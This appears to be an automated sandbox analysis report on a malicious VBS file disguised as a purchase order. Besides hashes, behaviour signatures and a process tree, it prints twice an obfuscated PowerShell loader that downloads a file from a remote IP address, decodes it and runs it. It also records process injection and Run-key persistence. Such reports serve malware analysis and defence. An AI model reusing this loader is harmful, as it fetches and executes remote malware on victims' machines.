Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
18/04/2024, 19:02
General
-
Target
PO_La-Tanerie04180240124.vbs
-
Size
187KB
-
MD5
2ea61e83ee687b29c058279893e1df8c
-
SHA1
0c6fc46e4a0bf4c62a5cd2e263313e82f2977a50
-
SHA256
a3483bf7a148434868b34bae2923006067f9e5e3ef2a2f62efaf6a32b93cddfc
-
SHA512
a810bd13d522775d4d9c3ef3e6775da5cc34db90d4826da9c96fb37c1d84dd37ad5eb84fc2c3095b3a9a065fbbd54a4892f96d867f879de14708d4f409f82ca8
-
SSDEEP
3072:2vU8jq6KK8ccABOwbDS2y2zJETxUuoHh38zH/O4SCvewvB7wrsCREBJo5mFSar+c:J6R8ccABOwbDA2zJETxVu1iH/GsW3EBB
Malware Config
Signatures
-
Adds policy Run key to start application 2 TTPs 2 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
-
Suspicious behavior: MapViewOfSection 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_La-Tanerie04180240124.vbs"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Projektforlb = 1;$Zenithward='Substrin';$Zenithward+='g';Function Recoverability($Prvekrendes){$Afproevning=$Prvekrendes.Length-$Projektforlb;For($Automatpiloten=1; $Automatpiloten -lt $Afproevning; $Automatpiloten+=(2)){$Overgraduated+=$Prvekrendes.$Zenithward.Invoke($Automatpiloten, $Projektforlb);}$Overgraduated;}function Prespontaneously($Fstningen){. ($Herreekviperingshandlere) ($Fstningen);}$Smutchiest=Recoverability 'UMFofzCislBlLa./ 5,.,0O P( WCiUn,d.o wUsA ,N TP K1.0I.K0.; WUi n.6V4S;S DxN6.4 ;Q .rPvQ: 1W2 1,. 0 )B SG eDcTkGoS/T2.0C1 0S0.1.0A1 BF iOrAeUf oPxR/B1.2,1U.B0 ';$agrestian=Recoverability 'AU sFe rH-KAKg eCnItM ';$Slvsindets=Recoverability ' hBtst.pI: /./P8Z7..K1 2 1,..1,0T5D.A1 6,3,/,TTapkTt.r eugSuJl,eVrFi n gSs aMfEtFa,l eBrO. d w p. ';$Tersely=Recoverability ',>, ';$Herreekviperingshandlere=Recoverability ' i eMx ';$supercilia = Recoverability 'Ce cFh o %MappTpWdDaBt aW%S\FSFuMk.k,eSrFrSoBe rT.TTDe,t. ,& & ,e cCh oB $F ';Prespontaneously (Recoverability 'S$ag lTo bSaSl :SE tMe r n a lSi tay,=p( c.m dK O/.c, ,$Gs uFp e rFc iRlLiUa.) ');Prespontaneously (Recoverability ' $Cg.l.o bMaRl :RL.a.g.eOtus.=C$wSLl v sFiEn d,eSt,s .,sEpKlRi t ( $TT e,r sFeyl yR)d ');$Slvsindets=$Lagets[0];Prespontaneously (Recoverability 'S$ g lBo bSa l :AA rPg eJn tCiPt e =NN.e.w - O,bMjReTcCt DSSyVs t,ePmS. N edtQ. WUe,bMC lSiHeSn t ');Prespontaneously (Recoverability ',$HA rFg eDn,t,iFtBeE.UH eFa,dCeHrKsG[.$,aSg,rMeSsetQi.aGn ]T=S$OSpmHu,tTcFh.i eHsFt ');$unwedged=Recoverability ' A rsgReDnVtZi.t eH.RD oRwHnGl.oCa.d F,i l eS(S$.S,l v.sRi,n dSeWtNs,,.$ TBrRaPnNsApFa l,a.tTiDn.e.) ';$unwedged=$Eternality[1]+$unwedged;$Transpalatine=$Eternality[0];Prespontaneously (Recoverability 'U$ g.l oTb a.lG:,O,fFf iMc eorpe,nmsD= (,T,e sStL-tPGahtDh ,$STSr,aSn,sApEa l,aCt ifnte )H ');while (!$Officerens) {Prespontaneously (Recoverability ',$,gBlSoAbTaUlE:.F.a i r.y.=C$ tOr u.es ') ;Prespontaneously $unwedged;Prespontaneously (Recoverability ' SAt a rBtR-PS.l eUe p O4 ');Prespontaneously (Recoverability ' $.g lPoEbpaKl :.O fMfOiucDe rVe,n.sA=H(NT e s tF- PPattBh N$STHrTaSn.s p,aPl.a teiPnveT). ') ;Prespontaneously (Recoverability ' $CgWl,ovbOa.lO:,GaaDuRsHsZbSr,e.dPd e,rBn.eAsH=,$Og,l o b asl :,sHtLr.a.nHgTl,eShPoSl.d.+J+.% $ L,aMgHe,t,sO.Sc,o uJnPt. ') ;$Slvsindets=$Lagets[$Gaussbreddernes];}Prespontaneously (Recoverability ' $Bg l.oRbGaGlP: S tAy n e b=P KGPeUtW- CBoSn,tTeUnNt, $ T,rFatnVs,pSa l a.tkiKnFe ');Prespontaneously (Recoverability '.$Ag lSo bIaSl :FC e n tSr a lUsky,g,e hfuIs eLnDe.sT B=S [ASKy.s tTeSmE..CAoVnBv eKr,tV]E:,:OF.r o m BBa,sReR6 4.SAt r,iUnSg (.$RSSt y nMe )S ');Prespontaneously (Recoverability ',$.g,l oUbCaGl :MSCc,htn oCoRk s, T=S C[RS.y sNt.e m .,TAePxbt.. E n,cPo d,i nPg ] :H: A SJC,ITIS.BG eRtaSptSr iUn gS( $FC ePn tFrTa l s yBgRe h uMs e n e sb). ');Prespontaneously (Recoverability ' $Cg,l,o b.a,lP: LRyMmUpWhUoFc.y tUo.t iMc,=.$ SFc h nMo.o.k sU.Vs u.b sSt,rtiBn.gS(G3.2b1.8D9R0 ,,2U5I0H0 8C) ');Prespontaneously $Lymphocytotic;"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sukkerroer.Tet && echo $"4⤵
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Projektforlb = 1;$Zenithward='Substrin';$Zenithward+='g';Function Recoverability($Prvekrendes){$Afproevning=$Prvekrendes.Length-$Projektforlb;For($Automatpiloten=1; $Automatpiloten -lt $Afproevning; $Automatpiloten+=(2)){$Overgraduated+=$Prvekrendes.$Zenithward.Invoke($Automatpiloten, $Projektforlb);}$Overgraduated;}function Prespontaneously($Fstningen){. ($Herreekviperingshandlere) ($Fstningen);}$Smutchiest=Recoverability 'UMFofzCislBlLa./ 5,.,0O P( WCiUn,d.o wUsA ,N TP K1.0I.K0.; WUi n.6V4S;S DxN6.4 ;Q .rPvQ: 1W2 1,. 0 )B SG eDcTkGoS/T2.0C1 0S0.1.0A1 BF iOrAeUf oPxR/B1.2,1U.B0 ';$agrestian=Recoverability 'AU sFe rH-KAKg eCnItM ';$Slvsindets=Recoverability ' hBtst.pI: /./P8Z7..K1 2 1,..1,0T5D.A1 6,3,/,TTapkTt.r eugSuJl,eVrFi n gSs aMfEtFa,l eBrO. d w p. ';$Tersely=Recoverability ',>, ';$Herreekviperingshandlere=Recoverability ' i eMx ';$supercilia = Recoverability 'Ce cFh o %MappTpWdDaBt aW%S\FSFuMk.k,eSrFrSoBe rT.TTDe,t. ,& & ,e cCh oB $F ';Prespontaneously (Recoverability 'S$ag lTo bSaSl :SE tMe r n a lSi tay,=p( c.m dK O/.c, ,$Gs uFp e rFc iRlLiUa.) ');Prespontaneously (Recoverability ' $Cg.l.o bMaRl :RL.a.g.eOtus.=C$wSLl v sFiEn d,eSt,s .,sEpKlRi t ( $TT e,r sFeyl yR)d ');$Slvsindets=$Lagets[0];Prespontaneously (Recoverability 'S$ g lBo bSa l :AA rPg eJn tCiPt e =NN.e.w - O,bMjReTcCt DSSyVs t,ePmS. N edtQ. WUe,bMC lSiHeSn t ');Prespontaneously (Recoverability ',$HA rFg eDn,t,iFtBeE.UH eFa,dCeHrKsG[.$,aSg,rMeSsetQi.aGn ]T=S$OSpmHu,tTcFh.i eHsFt ');$unwedged=Recoverability ' A rsgReDnVtZi.t eH.RD oRwHnGl.oCa.d F,i l eS(S$.S,l v.sRi,n dSeWtNs,,.$ TBrRaPnNsApFa l,a.tTiDn.e.) ';$unwedged=$Eternality[1]+$unwedged;$Transpalatine=$Eternality[0];Prespontaneously (Recoverability 'U$ g.l oTb a.lG:,O,fFf iMc eorpe,nmsD= (,T,e sStL-tPGahtDh ,$STSr,aSn,sApEa l,aCt ifnte )H ');while (!$Officerens) {Prespontaneously (Recoverability ',$,gBlSoAbTaUlE:.F.a i r.y.=C$ tOr u.es ') ;Prespontaneously $unwedged;Prespontaneously (Recoverability ' SAt a rBtR-PS.l eUe p O4 ');Prespontaneously (Recoverability ' $.g lPoEbpaKl :.O fMfOiucDe rVe,n.sA=H(NT e s tF- PPattBh N$STHrTaSn.s p,aPl.a teiPnveT). ') ;Prespontaneously (Recoverability ' $CgWl,ovbOa.lO:,GaaDuRsHsZbSr,e.dPd e,rBn.eAsH=,$Og,l o b asl :,sHtLr.a.nHgTl,eShPoSl.d.+J+.% $ L,aMgHe,t,sO.Sc,o uJnPt. ') ;$Slvsindets=$Lagets[$Gaussbreddernes];}Prespontaneously (Recoverability ' $Bg l.oRbGaGlP: S tAy n e b=P KGPeUtW- CBoSn,tTeUnNt, $ T,rFatnVs,pSa l a.tkiKnFe ');Prespontaneously (Recoverability '.$Ag lSo bIaSl :FC e n tSr a lUsky,g,e hfuIs eLnDe.sT B=S [ASKy.s tTeSmE..CAoVnBv eKr,tV]E:,:OF.r o m BBa,sReR6 4.SAt r,iUnSg (.$RSSt y nMe )S ');Prespontaneously (Recoverability ',$.g,l oUbCaGl :MSCc,htn oCoRk s, T=S C[RS.y sNt.e m .,TAePxbt.. E n,cPo d,i nPg ] :H: A SJC,ITIS.BG eRtaSptSr iUn gS( $FC ePn tFrTa l s yBgRe h uMs e n e sb). ');Prespontaneously (Recoverability ' $Cg,l,o b.a,lP: LRyMmUpWhUoFc.y tUo.t iMc,=.$ SFc h nMo.o.k sU.Vs u.b sSt,rtiBn.gS(G3.2b1.8D9R0 ,,2U5I0H0 8C) ');Prespontaneously $Lymphocytotic;"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sukkerroer.Tet && echo $"5⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
-
-
C:\Windows\SysWOW64\AtBroker.exe"C:\Windows\SysWOW64\AtBroker.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
7KB
MD5941f26c6c498c29941013d0c9976b97e
SHA10676a435d6ad4a1d3ca5bd65c3b3c1c9e5475f85
SHA256f6f5a8a06fda2f57ecf00056c66b6157b5074bd6a222ad2111ad40fdc82af390
SHA512c28c537fd7edf9adae8ec4296a360cd2f2d74b56dd34b821c7834278f0b307e7ffec1b74eaf6be3967f6416c00b179478c7713eff6a8b4bf7355e8b7a6afd98e
-
Filesize
451KB
MD520a3bfc6ed1ce2abd176c7abffe0d815
SHA1c08ac2fe2540df9063f25661db898865b3b189d1
SHA256615247c375706fcfc9261502cd1b15ad30d9491913ae418d2e9f6723dce466b9
SHA512ac141f428b4d71e19916f253821c2bcfffe420c57425f1114ccea3ef79a5ce00baf89d811bd740e687cd5ed7498cb6d99d0c7d091291aed1df48558094ea51df
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
1024KB
-
Filesize
8.9MB
-
Filesize
8.9MB
-
Filesize
3.0MB
-
Filesize
1.5MB
-
Filesize
140KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.7MB
-
Filesize
140KB
-
Filesize
1.5MB
-
Filesize
1.7MB
-
Filesize
856KB
-
Filesize
4KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
856KB
-
Filesize
1024KB
-
Filesize
1.7MB
-
Filesize
256KB
-
Filesize
70.0MB
-
Filesize
4KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
1024KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
3.0MB
-
Filesize
256KB
-
Filesize
648KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
648KB